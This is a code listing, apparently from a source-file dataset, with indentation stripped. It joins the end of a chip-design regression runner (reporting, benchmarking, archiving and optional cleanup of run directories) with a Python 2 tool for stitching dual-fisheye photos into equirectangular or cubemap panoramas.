rmDesignFromPrintList(design)
log.info(
"{design} {tag} finished\t Writing report...".format(design=design, tag=tag)
)
params = ConfigHandler.get_config(design, tag)
report = Report(design, tag, design_name, params).get_report()
report_log.info(report)
with open(run_path + "final_report.txt", "w") as report_file:
report_file.write(Report.get_header() + "," + ConfigHandler.get_header())
report_file.write("\n")
report_file.write(report)
if args.benchmark is not None:
try:
log.info(
"{design} {tag} Comparing with benchmark results...".format(
design=design, tag=tag
)
)
design_benchmark_comp_cmd = "python3 scripts/compare_regression_design.py -b {benchmark} -r {this_run} -o {output_report} -d {design} -rp {run_path}".format(
benchmark=args.benchmark,
this_run=report_file_name + ".csv",
output_report=report_file_name + "_design_test_report.csv",
design=design,
run_path=run_path,
)
subprocess.check_output(design_benchmark_comp_cmd.split())
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed to compare with benchmark: {error_msg}".format(
design=design, tag=tag, error_msg=error_msg
)
)
if args.clean:
try:
log.info(
"{design} {tag} Cleaning tmp/...".format(
design=design, tag=tag
)
)
moveUnPadded_cmd = (
"cp {run_path}/tmp/merged_unpadded.lef {run_path}/results/".format(
run_path=run_path, tag=tag
)
)
subprocess.check_output(moveUnPadded_cmd.split())
clean_cmd = "rm -rf {run_path}/tmp/".format(run_path=run_path, tag=tag)
subprocess.check_output(clean_cmd.split())
log.info(
"{design} {tag} tmp/ cleaned.".format(
design=design, tag=tag
)
)
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed to clean the tmp directory: {error_msg}".format(
design=design, tag=tag, error_msg=error_msg
)
)
if tarList[0] != "":
log.info(
"{design} {tag} Compressing run directory...".format(
design=design, tag=tag
)
)
try:
if "all" in tarList:
tarAll_cmd = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz {run_path}".format(
run_path=run_path, design_name=design_name, tag=tag
)
subprocess.check_output(tarAll_cmd.split())
else:
tarString = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz"
for dirc in tarList:
tarString += " {run_path}" + dirc
tar_cmd = tarString.format(
run_path=run_path, design_name=design_name, tag=tag
)
subprocess.check_output(tar_cmd.split())
log.info(
"{design} {tag} Compressing Run Directory Finished".format(
design=design, tag=tag
)
)
except subprocess.CalledProcessError as e:
log.info(
"{design} {tag} Compressing Run Directory Failed".format(
design=design, tag=tag
)
)
if args.delete:
try:
log.info(
"{design} {tag} Deleting run directory...".format(
design=design, tag=tag
)
)
deleteDirectory = "rm -rf {run_path}".format(run_path=run_path)
subprocess.check_output(deleteDirectory.split())
log.info(
"{design} {tag} Run directory deleted.".format(
design=design, tag=tag
)
)
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed to delete the run directory: {error_msg}".format(
design=design, tag=tag, error_msg=error_msg
)
)
que = queue.Queue()
total_runs = 0
if regression is not None:
regression_file = os.path.join(os.getcwd(), regression)
number_of_configs = 0
for design in designs:
base_path = utils.get_design_path(design=design)
if base_path is None:
log.error("{design} not found, skipping...".format(design=design))
if print_rem_time is not None:
if design in rem_designs.keys():
rem_designs.pop(design)
continue
design_name = utils.get_design_name(design, config)
if design_name.startswith("[INVALID]:"):
log.error(
"{design} will not Run, {reason}".format(
design=design, reason=design_name
)
)
continue
base_config_path = base_path + "base_config.tcl"
ConfigHandler.gen_base_config(design, base_config_path)
gen_config_cmd = "./scripts/config/generate_config.sh {base_config} {output_path} config_{tag} {regression_file}".format(
base_config=base_config_path,
output_path=base_path,
tag=tag,
regression_file=regression_file,
)
number_of_configs = subprocess.check_output(gen_config_cmd.split())
number_of_configs = int(number_of_configs.decode(sys.getdefaultencoding()))
total_runs = total_runs + number_of_configs
if print_rem_time is not None:
rem_designs[design] = number_of_configs
for i in range(number_of_configs):
config_tag = "config_{tag}_{idx}".format(tag=tag, idx=i)
config_file = "{base_path}/{config_tag}".format(
base_path=base_path,
config_tag=config_tag,
)
que.put((design, config_tag, config_tag, design_name))
else:
for design in designs:
base_path = utils.get_design_path(design=design)
if base_path is None:
log.error("{design} not found, skipping...".format(design=design))
if print_rem_time is not None:
if design in rem_designs.keys():
rem_designs.pop(design)
continue
default_config_tag = "config_{tag}".format(tag=tag)
design_name = utils.get_design_name(design, config)
if design_name.startswith("[INVALID]:"):
log.error(
"{design} Will not Run, {reason}".format(
design=design, reason=design_name
)
)
continue
que.put((design, config, default_config_tag, design_name))
workers = []
for i in range(num_workers):
workers.append(threading.Thread(target=run_design, args=(que,)))
workers[i].start()
for i in range(num_workers):
while workers[i].is_alive() == True:
workers[i].join(100)
print("Exiting thread", i)
log.info("Getting top results...")
best_result_cmd = "python3 ./scripts/report/get_best.py -i {input} -o {output}".format(
input=report_handler.baseFilename, output=report_file_name + "_best.csv"
)
subprocess.check_output(best_result_cmd.split())
if args.htmlExtract:
log.info("Creating HTML report...")
csv2html_result_cmd = (
"python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
input=report_file_name + ".csv", output=report_file_name + ".html"
)
)
subprocess.check_output(csv2html_result_cmd.split())
csv2besthtml_result_cmd = (
"python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
input=report_file_name + "_best.csv", output=report_file_name + "_best.html"
)
)
subprocess.check_output(csv2besthtml_result_cmd.split())
utils.addComputedStatistics(report_file_name + ".csv")
utils.addComputedStatistics(report_file_name + "_best.csv")
if args.benchmark is not None:
log.info("Benchmarking...")
full_benchmark_comp_cmd = "python3 scripts/compare_regression_reports.py -ur -b {benchmark} -r {this_run} -o {output_report} -x {output_xlsx}".format(
benchmark=args.benchmark,
this_run=report_file_name + ".csv",
output_report=report_file_name + "_benchmark_written_report.rpt",
output_xlsx=report_file_name + "_benchmark_final_report.xlsx",
)
subprocess.check_output(full_benchmark_comp_cmd.split())
log.info("Done")
|
fisheye.py
|
# -*- coding: utf-8 -*-
# Dual-fisheye to 360-photo conversion tool
# Supports equirectangular and cubemap output formats
#
# Usage instructions:
# python fisheye.py'
# Start interactive alignment GUI.
# python fisheye.py -help
# Print this help message.
# python fisheye.py lens.cfg in1.jpg in2.jpg gui
# Launch interactive GUI with specified default options
# python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png
# Render and save equirectangular panorama using specified
# lens configuration and source images.'
# python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png
# Render and save cubemap panorama using specified
# lens configuration and source images.
#
# Copyright (c) 2016 Alexander C. Utter
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import json
import numpy as np
import Tkinter as tk
import tkFileDialog
import tkMessageBox
import sys
import traceback
from copy import deepcopy
from math import pi
from PIL import Image, ImageTk
from scipy.optimize import minimize
from threading import Thread
# Create rotation matrix from an arbitrary quaternion. See also:
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def get_rotation_matrix(qq):
# Normalize matrix and extract individual items.
qq_norm = np.sqrt(np.sum(np.square(qq)))
w = qq[0] / qq_norm
x = qq[1] / qq_norm
y = qq[2] / qq_norm
z = qq[3] / qq_norm
# Convert to rotation matrix.
return np.matrix([[w*w+x*x-y*y-z*z, 2*x*y-2*w*z, 2*x*z+2*w*y],
[2*x*y+2*w*z, w*w-x*x+y*y-z*z, 2*y*z-2*w*x],
[2*x*z-2*w*y, 2*y*z+2*w*x, w*w-x*x-y*y+z*z]], dtype='float32')
# Conjugate a quaternion to apply the opposite rotation.
def conj_qq(qq):
return np.array([qq[0], -qq[1], -qq[2], -qq[3]])
# Multiply two quaternions:ab = (a0b0 - av dot bv; a0*bv + b0av + av cross bv)
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def mul_qq(qa, qb):
return np.array([qa[0]*qb[0] - qa[1]*qb[1] - qa[2]*qb[2] - qa[3]*qb[3],
qa[0]*qb[1] + qa[1]*qb[0] + qa[2]*qb[3] - qa[3]*qb[2],
qa[0]*qb[2] + qa[2]*qb[0] + qa[3]*qb[1] - qa[1]*qb[3],
qa[0]*qb[3] + qa[3]*qb[0] + qa[1]*qb[2] - qa[2]*qb[1]])
# Generate a normalized quaternion [W,X,Y,Z] from [X,Y,Z]
def norm_qq(x, y, z):
rsq = x**2 + y**2 + z**2
if rsq < 1:
w = np.sqrt(1-rsq)
return [w, x, y, z]
else:
r = np.sqrt(rsq)
return [0, x/r, y/r, z/r]
# Return length of every column in an MxN matrix.
def matrix_len(x):
#return np.sqrt(np.sum(np.square(x), axis=0))
return np.linalg.norm(x, axis=0)
# Normalize an MxN matrix such that all N columns have unit length.
def matrix_norm(x):
return x / (matrix_len(x) + 1e-9)
# Parameters for a fisheye lens, including its orientation.
class FisheyeLens:
def __init__(self, rows=1024, cols=1024):
# Fisheye lens parameters.
self.fov_deg = 180
self.radius_px = min(rows,cols) / 2
# Pixel coordinates of the optical axis (X,Y).
self.center_px = np.matrix([[cols/2], [rows/2]])
# Quaternion mapping intended to actual optical axis.
self.center_qq = [1, 0, 0, 0]
def downsample(self, dsamp):
self.radius_px /= dsamp
self.center_px /= dsamp
def get_x(self):
return np.asscalar(self.center_px[0])
def get_y(self):
return np.asscalar(self.center_px[1])
def to_dict(self):
return {'cx':self.get_x(),
'cy':self.get_y(),
'cr':self.radius_px,
'cf':self.fov_deg,
'qw':self.center_qq[0],
'qx':self.center_qq[1],
'qy':self.center_qq[2],
'qz':self.center_qq[3]}
def from_dict(self, data):
self.center_px[0] = data['cx']
self.center_px[1] = data['cy']
self.radius_px = data['cr']
self.fov_deg = data['cf']
self.center_qq[0] = data['qw']
self.center_qq[1] = data['qx']
self.center_qq[2] = data['qy']
self.center_qq[3] = data['qz']
# Load or save lens configuration and alignment.
def load_config(file_obj, lens1, lens2):
[data1, data2] = json.load(file_obj)
lens1.from_dict(data1)
lens2.from_dict(data2)
def save_config(file_obj, lens1, lens2):
data = [lens1.to_dict(), lens2.to_dict()]
json.dump(data, file_obj, indent=2, sort_keys=True)
# Fisheye source image, with lens and rotation parameters.
# Contains functions for extracting pixel data given direction vectors.
class FisheyeImage:
# Load image file and set default parameters
def __init__(self, src_file, lens=None):
# Load the image file, and convert to a numpy matrix.
self._update_img(Image.open(src_file))
# Set lens parameters.
if lens is None:
self.lens = FisheyeLens(self.rows, self.cols)
else:
self.lens = lens
# Update image matrix and corresponding size variables.
def _update_img(self, img):
self.img = np.array(img)
self.rows = self.img.shape[0]
self.cols = self.img.shape[1]
self.clrs = self.img.shape[2]
# Shrink source image and adjust lens accordingly.
def downsample(self, dsamp):
# Adjust lens parameters.
self.lens.downsample(dsamp)
# Determine the new image dimensions.
# Note: PIL uses cols, rows whereas numpy uses rows, cols
shape = (self.img.shape[1] / dsamp, # Cols
self.img.shape[0] / dsamp) # Rows
# Convert matrix back to PIL Image and resample.
img = Image.fromarray(self.img)
img.thumbnail(shape, Image.BICUBIC)
# Convert back and update size.
self._update_img(img)
# Given an 3xN array of "XYZ" vectors in panorama space (+X = Front),
# convert each ray to 2xN coordinates in "UV" fisheye image space.
def get_uv(self, xyz_vec):
# Extract lens parameters of interest.
fov_rad = self.lens.fov_deg * pi / 180
fov_scale = np.float32(2 * self.lens.radius_px / fov_rad)
# Normalize the input vector and rotate to match lens reference axes.
xyz_rot = get_rotation_matrix(self.lens.center_qq) * matrix_norm(xyz_vec)
# Convert to polar coordinates relative to lens boresight.
# (In lens coordinates, unit vector's X axis gives boresight angle;
# normalize Y/Z to get a planar unit vector for the bearing.)
# Note: Image +Y maps to 3D +Y, and image +X maps to 3D +Z.
theta_rad = np.arccos(xyz_rot[0,:])
proj_vec = matrix_norm(np.concatenate((xyz_rot[2,:], xyz_rot[1,:])))
# Fisheye lens maps 3D angle to focal-plane radius.
# TODO: Do we need a better model for lens distortion?
rad_px = theta_rad * fov_scale
# Convert back to focal-plane rectangular coordinates.
uv = np.multiply(rad_px, proj_vec) + self.lens.center_px
return np.asarray(uv + 0.5, dtype=int)
# Given an 2xN array of UV pixel coordinates, check if each pixel is
# within the fisheye field of view. Returns N-element boolean mask.
def get_mask(self, uv_px):
# Check whether each coordinate is within outer image bounds,
# and within the illuminated area under the fisheye lens.
x_mask = np.logical_and(0 <= uv_px[0], uv_px[0] < self.cols)
y_mask = np.logical_and(0 <= uv_px[1], uv_px[1] < self.rows)
# Check whether each coordinate is within the illuminated area.
r_mask = matrix_len(uv_px - self.lens.center_px) < self.lens.radius_px
# All three checks must pass to be considered visible.
all_mask = np.logical_and(r_mask, np.logical_and(x_mask, y_mask))
return np.squeeze(np.asarray(all_mask))
# Given an 2xN array of UV pixel coordinates, return a weight score
# that is proportional to the distance from the edge.
def get_weight(self, uv_px):
mm = self.get_mask(uv_px)
rr = self.lens.radius_px - matrix_len(uv_px - self.lens.center_px)
rr[~mm] = 0
return rr
# Given a 2xN array of UV pixel coordinates, return the value of each
# corresponding pixel. Output format is Nx1 (grayscale) or Nx3 (color).
# Pixels outside the fisheye's field of view are pure black (0) or (0,0,0).
def get_pixels(self, uv_px):
# Create output array with default pixel values.
pcount = uv_px.shape[1]
result = np.zeros((pcount, self.clrs), dtype=self.img.dtype)
# Overwrite in-bounds pixels as specified above.
self.add_pixels(uv_px, result)
return result
# Given a 2xN array of UV pixel coordinates, write the value of each
# corresponding pixel to the linearized input/output image (Nx3).
# Several weighting modes are available.
def add_pixels(self, uv_px, img1d, weight=None):
# Lookup row & column for each in-bounds coordinate.
mask = self.get_mask(uv_px)
xx = uv_px[0,mask]
yy = uv_px[1,mask]
# Update matrix according to assigned weight.
if weight is None:
img1d[mask] = self.img[yy,xx]
elif np.isscalar(weight):
img1d[mask] += self.img[yy,xx] * weight
else:
w1 = np.asmatrix(weight, dtype='float32')
w3 = w1.transpose() * np.ones((1,3))
img1d[mask] += np.multiply(self.img[yy,xx], w3[mask])
# A panorama image made from several FisheyeImage sources.
# TODO: Add support for supersampled anti-aliasing filters.
class PanoramaImage:
def __init__(self, src_list):
self.debug = True
self.sources = src_list
self.dtype = self.sources[0].img.dtype
self.clrs = self.sources[0].clrs
# Downsample each source image.
def downsample(self, dsamp):
for src in self.sources:
src.downsample(dsamp)
# Return a list of 'mode' strings suitable for render_xx() methods.
def get_render_modes(self):
return ['overwrite', 'align', 'blend']
# Retrieve a scaled copy of lens parameters for the Nth source.
def scale_lens(self, idx, scale=None):
temp = deepcopy(self.sources[idx].lens)
temp.downsample(1.0 / scale)
return temp
# Using current settings as an initial guess, use an iterative optimizer
# to better align the source images. Adjusts FOV of each lens, as well
# as the rotation quaternions for all lenses except the first.
# TODO: Implement a higher-order loop that iterates this step with
# progressively higher resolution. (See also: create_panorama)
# TODO: Find a better scoring heuristic. Present solution always
# converges on either FOV=0 or FOV=9999, depending on wt_pixel.
def optimize(self, psize=256, wt_pixel=1000, wt_blank=1000):
# Precalculate raster-order XYZ coordinates at given resolution.
[xyz, rows, cols] = self._get_equirectangular_raster(psize)
# Scoring function gives bonus points per overlapping pixel.
score = lambda svec: self._score(svec, xyz, wt_pixel, wt_blank)
# Multivariable optimization using gradient-descent or similar.
# https://docs.scipy.org/doc/scipy/reference/tutorial/optimize.html
svec0 = self._get_state_vector()
final = minimize(score, svec0, method='Nelder-Mead',
options={'xtol':1e-4, 'disp':True})
# Store final lens parameters.
self._set_state_vector(final.x)
# Render combined panorama in equirectangular projection mode.
# See also: https://en.wikipedia.org/wiki/Equirectangular_projection
def render_equirectangular(self, out_size, mode='blend'):
# Render the entire output in a single pass.
[xyz, rows, cols] = self._get_equirectangular_raster(out_size)
return Image.fromarray(self._render(xyz, rows, cols, mode))
# Render combined panorama in cubemap projection mode.
# See also: https://en.wikipedia.org/wiki/Cube_mapping
def render_cubemap(self, out_size, mode='blend'):
# Create coordinate arrays.
cvec = np.arange(out_size, dtype='float32') - out_size/2 # Coordinate range [-S/2, S/2)
vec0 = np.ones(out_size*out_size, dtype='float32') * out_size/2 # Constant vector +S/2
vec1 = np.repeat(cvec, out_size) # Increment every N steps
vec2 = np.tile(cvec, out_size) # Sweep N times
# Create XYZ coordinate vectors and render each cubemap face.
render = lambda(xyz): self._render(xyz, out_size, out_size, mode)
xm = render(np.matrix([-vec0, vec1, vec2])) # -X face
xp = render(np.matrix([vec0, vec1, -vec2])) # +X face
ym = render(np.matrix([-vec1, -vec0, vec2])) # -Y face
yp = render(np.matrix([vec1, vec0, vec2])) # +Y face
zm = render(np.matrix([-vec2, vec1, -vec0])) # -Z face
zp = render(np.matrix([vec2, vec1, vec0])) # +Z face
# Concatenate the individual faces in canonical order:
# https://en.wikipedia.org/wiki/Cube_mapping#Memory_Addressing
img_mat = np.concatenate([zp, zm, ym, yp, xm, xp], axis=0)
return Image.fromarray(img_mat)
# Get XYZ vectors for an equirectangular render, in raster order.
# (Each row left to right, with rows concatenates from top to bottom.)
def _get_equirectangular_raster(self, out_size):
# Set image size (2x1 aspect ratio)
rows = out_size
cols = 2*out_size
# Calculate longitude of each column.
theta_x = np.linspace(-pi, pi, cols, endpoint=False, dtype='float32')
cos_x = np.cos(theta_x).reshape(1,cols)
sin_x = np.sin(theta_x).reshape(1,cols)
# Calculate lattitude of each row.
ystep = pi / rows
theta_y = np.linspace(-pi/2 + ystep/2, pi/2 - ystep/2, rows, dtype='float32')
cos_y = np.cos(theta_y).reshape(rows,1)
sin_y = np.sin(theta_y).reshape(rows,1)
# Calculate X, Y, and Z coordinates for each output pixel.
x = cos_y * cos_x
y = sin_y * np.ones((1,cols), dtype='float32')
z = cos_y * sin_x
# Vectorize the coordinates in raster order.
xyz = np.matrix([x.ravel(), y.ravel(), z.ravel()])
return [xyz, rows, cols]
# Convert all lens parameters to a state vector. See also: optimize()
def _get_state_vector(self):
nsrc = len(self.sources)
assert nsrc > 0
svec = np.zeros(4*nsrc - 3)
# First lens: Only the FOV is stored.
svec[0] = self.sources[0].lens.fov_deg - 180
# All other lenses: Store FOV and quaternion parameters.
for n in range(1, nsrc):
svec[4*n-3] = self.sources[n].lens.fov_deg - 180
svec[4*n-2] = self.sources[n].lens.center_qq[1]
svec[4*n-1] = self.sources[n].lens.center_qq[2]
svec[4*n-0] = self.sources[n].lens.center_qq[3]
return svec
# Update lens parameters based on state vector. See also: optimize()
def _set_state_vector(self, svec):
# Sanity check on input vector.
nsrc = len(self.sources)
assert len(svec) == (4*nsrc - 3)
# First lens: Only the FOV is changed.
self.sources[0].lens.fov_deg = svec[0] + 180
# All other lenses: Update FOV and quaternion parameters.
for n in range(1, nsrc):
self.sources[n].lens.fov_deg = svec[4*n-3] + 180
self.sources[n].lens.center_qq[1] = svec[4*n-2]
self.sources[n].lens.center_qq[2] = svec[4*n-1]
self.sources[n].lens.center_qq[3] = svec[4*n-0]
# Add pixels from every source to form a complete output image.
# Several blending modes are available. See also: get_render_modes()
def _render(self, xyz, rows, cols, mode):
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
img1d = np.zeros((rows*cols, self.clrs), dtype='float32')
# Determine rendering mode:
if mode == 'overwrite':
# Simplest mode: Draw first, then blindly overwrite second.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d)
elif mode == 'align':
# Alignment mode: Draw each one at 50% intensity.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d, 0.5)
elif mode == 'blend':
# Linear nearest-source blending.
uv_list = []
wt_list = []
wt_total = np.zeros(rows*cols, dtype='float32')
# Calculate per-image and total weight matrices.
for src in self.sources:
uv = src.get_uv(xyz)
wt = src.get_weight(uv)
uv_list.append(uv)
wt_list.append(wt)
wt_total += wt
# Render overall image using calculated weights.
for n in range(len(self.sources)):
wt_norm = wt_list[n] / wt_total
self.sources[n].add_pixels(uv_list[n], img1d, wt_norm)
else:
raise ValueError('Invalid render mode.')
# Convert to fixed-point image matrix and return.
img2d = np.reshape(img1d, (rows, cols, self.clrs))
return np.asarray(img2d, dtype=self.dtype)
# Compute a normalized alignment score, based on size of overlap and
# the pixel-differences in that region. Note: Lower = Better.
def _score(self, svec, xyz, wt_pixel, wt_blank):
# Update lens parameters from state vector.
self._set_state_vector(svec)
# Determine masks for each input image.
uv0 = self.sources[0].get_uv(xyz)
uv1 = self.sources[1].get_uv(xyz)
wt0 = self.sources[0].get_weight(uv0) > 0
wt1 = self.sources[1].get_weight(uv1) > 0
# Count overlapping pixels.
ovr_mask = np.logical_and(wt0, wt1) # Overlapping pixel
pix_count = np.sum(wt0) + np.sum(wt1) # Total drawn pixels
blk_count = np.sum(np.logical_and(~wt0, ~wt1)) # Number of blank pixels
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
pcount = max(xyz.shape)
img1d = np.zeros((pcount, self.clrs), dtype='float32')
# Render the difference image, overlapping region only.
self.sources[0].add_pixels(uv0, img1d, 1.0*ovr_mask)
self.sources[1].add_pixels(uv1, img1d, -1.0*ovr_mask)
# Sum-of-differences.
sum_sqd = np.sum(np.sum(np.sum(np.square(img1d))))
# Compute overall score. (Note: Higher = Better)
score = sum_sqd + wt_blank * blk_count - wt_pixel * pix_count
# (Debug) Print status information.
if (self.debug):
print str(svec) + ' --> ' + str(score)
return score
# Tkinter GUI window for loading a fisheye image.
class FisheyeAlignmentGUI:
def __init__(self, parent, src_file, lens):
# Set flag once all window objects created.
self.init_done = False
# Final result is the lens object.
self.lens = lens
# Load the input file.
self.img = Image.open(src_file)
# Create frame for this window with two vertical panels...
parent.wm_title('Fisheye Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make sliders for adjusting the lens parameters quaternion.
self.x = self._make_slider(self.controls, 0, 'Center-X (px)',
lens.get_x(), self.img.size[0])
self.y = self._make_slider(self.controls, 1, 'Center-Y (px)',
lens.get_y(), self.img.size[1])
self.r = self._make_slider(self.controls, 2, 'Radius (px)',
lens.radius_px, self.img.size[0])
self.f = self._make_slider(self.controls, 3, 'Field of view (deg)',
lens.fov_deg, 240, res=0.1)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Create the canvas object for the preview image.
self.preview = tk.Canvas(self.preview_frm)
# Finish frame creation.
self.controls.pack(side=tk.LEFT)
self.preview.pack(fill=tk.BOTH, expand=1)
self.preview_frm.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview((800,800))
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Redraw the preview image using latest GUI parameters.
def update_preview(self, psize):
# Safety check: Ignore calls during construction/destruction.
if not self.init_done: return
# Copy latest user settings to the lens object.
self.lens.fov_deg = self.f.get()
self.lens.radius_px = self.r.get()
self.lens.center_px[0] = self.x.get()
self.lens.center_px[1] = self.y.get()
# Re-scale the image to match the canvas size.
# Note: Make a copy first, because thumbnail() operates in-place.
self.img_sc = self.img.copy()
self.img_sc.thumbnail(psize, Image.NEAREST)
self.img_tk = ImageTk.PhotoImage(self.img_sc)
# Re-scale the x/y/r parameters to match the preview scale.
pre_scale = float(psize[0]) / float(self.img.size[0])
x = self.x.get() * pre_scale
y = self.y.get() * pre_scale
r = self.r.get() * pre_scale
# Clear and redraw the canvas.
self.preview.delete('all')
self.preview.create_image(0, 0, anchor=tk.NW, image=self.img_tk)
self.preview.create_oval(x-r, y-r, x+r, y+r,
outline='#C00000', width=3)
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival, maxval, res=0.5):
# Create shared variable and set initial value.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=0, to=maxval, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=0, to=maxval, resolution=res)
label.grid(row=rowidx, column=0)
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Find the largest output size that fits within the given bounds and
# matches the aspect ratio of the original source image.
def _get_aspect_size(self, max_size):
img_ratio = float(self.img.size[1]) / float(self.img.size[0])
return (min(max_size[0], max_size[1] / img_ratio),
min(max_size[1], max_size[0] * img_ratio))
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the render size. (Always 2:1 aspect ratio.)
psize = self._get_aspect_size((self.preview_frm.winfo_width(),
self.preview_frm.winfo_height()))
# Render the preview at the given size.
if psize[0] >= 10 and psize[1] >= 10:
self.update_preview(psize)
# Tkinter GUI window for calibrating fisheye alignment.
class PanoramaAlignmentGUI:
def __init__(self, parent, panorama, psize=512):
self.init_done = False
# Store source and preview size
self.panorama = panorama
# Create frame for this window with two vertical panels...
parent.wm_title('Panorama Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make a drop-menu to select the rendering mode.
tk.Label(self.controls, text='Preview mode').grid(row=0, column=0, sticky=tk.W)
self.mode = tk.StringVar()
self.mode.set('align')
self.mode.trace('w', self._update_callback)
mode_list = self.panorama.get_render_modes()
mode_drop = tk.OptionMenu(self.controls, self.mode, *mode_list)
mode_drop.grid(row=0, column=1, columnspan=2, sticky='NESW')
# Determine which axis marks the main 180 degree rotation.
front_qq = panorama.sources[0].lens.center_qq
back_qq = panorama.sources[1].lens.center_qq
diff_qq = mul_qq(front_qq, back_qq)
# Create the axis selection toggle. (Flip on Y or Z)
self.flip_axis = tk.BooleanVar()
self.flip_axis.trace('w', self._update_callback)
if abs(diff_qq[2]) > abs(diff_qq[3]):
self.flip_axis.set(False)
flip_qq = [0,0,1,0]
else:
self.flip_axis.set(True)
flip_qq = [0,0,0,1]
tk.Label(self.controls, text='Flip axis').grid(row=1, column=0, sticky=tk.W)
axis_chk = tk.Checkbutton(self.controls, variable=self.flip_axis)
axis_chk.grid(row=1, column=1, columnspan=2, sticky='NESW')
# Extract the (hopefully small) alignment offset.
flip_conj = conj_qq(mul_qq(flip_qq, front_qq))
align_qq = mul_qq(back_qq, flip_conj)
# Make three sliders for adjusting the relative alignment.
self.slide_rx = self._make_slider(self.controls, 2, 'Rotate X', front_qq[1])
self.slide_ry = self._make_slider(self.controls, 3, 'Rotate Y', front_qq[2])
self.slide_rz = self._make_slider(self.controls, 4, 'Rotate Z', front_qq[3])
self.slide_ax = self._make_slider(self.controls, 5, 'Align X', align_qq[1])
self.slide_ay = self._make_slider(self.controls, 6, 'Align Y', align_qq[2])
self.slide_az = self._make_slider(self.controls, 7, 'Align Z', align_qq[3])
# Finish control-frame creation.
self.controls.pack(side=tk.LEFT)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Add the preview.
self.preview_lbl = tk.Label(self.preview_frm) # Label displays image
self.preview_lbl.pack()
self.preview_frm.pack(fill=tk.BOTH, expand=1)
# Finish frame creation.
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview(psize)
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Update the GUI preview using latest alignment parameters.
def update_preview(self, psize):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the primary axis of rotation.
if self.flip_axis.get():
flip_qq = [0,0,0,1]
else:
flip_qq = [0,0,1,0]
# Calculate the orientation of both lenses.
front_qq = norm_qq(self.slide_rx.get(),
self.slide_ry.get(),
self.slide_rz.get())
align_qq = norm_qq(self.slide_ax.get(),
self.slide_ay.get(),
self.slide_az.get())
back_qq = mul_qq(align_qq, mul_qq(flip_qq, front_qq))
self.panorama.sources[0].lens.center_qq = front_qq
self.panorama.sources[1].lens.center_qq = back_qq
# Render the preview.
# Note: The Tk-Label doesn't maintain a reference to the image object.
# To avoid garbage-collection, keep one in this class.
self.preview_img = ImageTk.PhotoImage(
self.panorama.render_equirectangular(psize, self.mode.get()))
# Assign the new icon.
self.preview_lbl.configure(image=self.preview_img)
# Find the largest output size that fits within the given bounds and
# matches the 2:1 aspect ratio of the equirectangular preview.
def _get_aspect_size(self, max_size):
return (min(max_size[0], max_size[1] / 2),
min(max_size[1], max_size[0] * 2))
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival):
# Set limits and resolution.
lim = 1.0
res = 0.001
# Create shared variable.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
